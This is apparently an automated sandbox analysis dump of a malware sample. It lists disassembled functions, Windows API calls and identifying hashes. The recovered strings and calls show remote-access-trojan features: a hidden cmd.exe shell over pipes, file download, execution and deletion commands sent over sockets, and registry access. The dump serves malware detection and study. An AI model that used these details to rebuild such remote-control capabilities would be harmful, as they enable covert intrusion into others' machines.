                                                                                                            • Opcode Fuzzy Hash: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                                                                                                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1203 412513-41253f RegOpenKeyExA 1204 412541-412567 RegQueryValueExA RegCloseKey 1203->1204 1205 412572 1203->1205 1204->1205 1206 412569-412570 1204->1206 1207 412577-412583 call 401f66 1205->1207 1206->1207
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                                                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                            • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                                                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1210 4124b7-4124df RegOpenKeyExA 1211 4124e1-412509 RegQueryValueExA RegCloseKey 1210->1211 1212 41250f-412512 1210->1212 1211->1212 1213 41250b-41250e 1211->1213
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1214 44e1ce-44e1dc GetEnvironmentStringsW 1215 44e1e2-44e1f1 call 44e114 call 446b0f 1214->1215 1216 44e1de-44e1e0 1214->1216 1221 44e1f6-44e1fc 1215->1221 1217 44e219-44e21d 1216->1217 1222 44e1fe-44e206 call 435ae0 1221->1222 1223 44e209-44e218 call 446ad5 FreeEnvironmentStringsW 1221->1223 1222->1223 1223->1217
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E1D2
                                                                                                            • _free.LIBCMT ref: 0044E20B
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E212
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$Free_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2716640707-0
                                                                                                            • Opcode ID: 0a295fd81f114cc829d5603ea341637f7dd9d1fa50949ca94c47d92f7d778ec6
                                                                                                            • Instruction ID: 604b519dfe4379e15ef5464dbc843faceff6e13584e6925da33daec4a3bd613e
                                                                                                            • Opcode Fuzzy Hash: 0a295fd81f114cc829d5603ea341637f7dd9d1fa50949ca94c47d92f7d778ec6
                                                                                                            • Instruction Fuzzy Hash: A7E0E53714492026F211722B7C4AD6B2A1DEFC27B6B26002AF40492243EE298D0240FA
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: xAG
                                                                                                            • API String ID: 176396367-2759412365
                                                                                                            • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                                                            • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                                                                                                            • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                                                            • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 0044B9EF
                                                                                                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                            • HeapReAlloc.KERNEL32(00000000,00475D50,?,00000004,00000000,?,0044E91A,00475D50,00000004,?,00475D50,?,?,00443135,00475D50,?), ref: 0044BA2B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocAllocate_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2447670028-0
                                                                                                            • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                            • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                                                                                                            • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                            • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                                                                                                            APIs
                                                                                                            • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEventStartupsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1953588214-0
                                                                                                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                            APIs
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                                                                                                              • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,00404AD0), ref: 00437C47
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                            • String ID:
                                                                                                            • API String ID: 3476068407-0
                                                                                                            • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                                            • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                                                                                                            • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                                            • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                                                                                                            APIs
                                                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                              • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 1170566393-0
                                                                                                            • Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                            • Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
                                                                                                            • Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                            • Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED
                                                                                                            APIs
                                                                                                              • Part of subcall function 00448716: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00437237,?,?,?,?,?,0040CC87,00434413), ref: 00448757
                                                                                                            • _free.LIBCMT ref: 0044EF31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 614378929-0
                                                                                                            • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                            • Instruction ID: a7d529a76fd4b3acccd1592f2db4ae6b5003facb603dcc9161a9cd98b3869489
                                                                                                            • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                            • Instruction Fuzzy Hash: A0012B722003046BF321CF6AC84195AFBD9FB85370F25051EE58453280EA346806C778
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,00437237,?,?,?,?,?,0040CC87,00434413), ref: 00448757
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: c0e71c43265bb7a2ed883484c95d5de73dd4aa74b019aeb8b9faa22b7eb24aee
                                                                                                            • Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
                                                                                                            • Opcode Fuzzy Hash: c0e71c43265bb7a2ed883484c95d5de73dd4aa74b019aeb8b9faa22b7eb24aee
                                                                                                            • Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                            • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                                                                                            • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                            • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                                                                                                            APIs
                                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Startup
                                                                                                            • String ID:
                                                                                                            • API String ID: 724789610-0
                                                                                                            • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                            • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                            • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                            • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: recv
                                                                                                            • String ID:
                                                                                                            • API String ID: 1507349165-0
                                                                                                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: send
                                                                                                            • String ID:
                                                                                                            • API String ID: 2809346765-0
                                                                                                            • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                            • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                              • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                              • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                              • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                              • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                            • API String ID: 2918587301-599666313
                                                                                                            • Opcode ID: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
                                                                                                            • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                                                                            • Opcode Fuzzy Hash: 67ca82a687dc1e454a75cc368f4517d0e6d9aa3d6c6889860952e852b2957f07
                                                                                                            • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                            • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                                                                            • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                                                                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                            • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                            • API String ID: 3815868655-1274243119
                                                                                                            • Opcode ID: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
                                                                                                            • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                            • Opcode Fuzzy Hash: 8cbc04d304936592b8c30d8c5467e03ddebc48fda1e63d99d06426c92a2a1825
                                                                                                            • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
